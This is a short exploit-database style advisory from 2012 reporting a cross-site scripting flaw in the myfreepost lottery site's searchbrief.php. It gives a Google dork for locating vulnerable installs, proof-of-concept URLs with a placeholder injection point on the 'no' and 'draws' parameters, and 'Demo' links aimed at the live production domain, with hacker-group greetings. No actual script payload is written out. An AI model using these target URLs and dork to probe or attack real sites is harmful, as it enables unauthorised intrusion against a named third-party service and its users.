################################################## # Exploit Title: myfreepost (searchbrief.php) <= XSS Vulnerability # Date: 07/10/2012 # Author: Ryuzaki Lawlet # Web/Blog: http://justryuz.blogspot.com # 3Mail: ryuzaki_l@y7mail.com # Category: webapps # Google dork: fsearchbrief.php?no= # Tested on: Linux +---------------------------------------------------+ [~]Exploit/p0c : http://localhost/my4D_searchbrief.php?no=[XSS] http://localhost/sgTOTO_freq.php?draws=[ [~] Demo http://my.myfreepost.com/my4D_searchbrief.php?no=[xss] http://www.myfreepost.com/lottery/index.php/us/arizonalottery/pick3/search_brief/?no=[XSS] [~] Image http://1.bp.blogspot.com/-OKZTASS-9R4/UHCUi4fyDPI/AAAAAAAAApY/j2593IXcj38/s1600/xss.png +---------------------------------------------------+ Greetz to : ./CyberSEC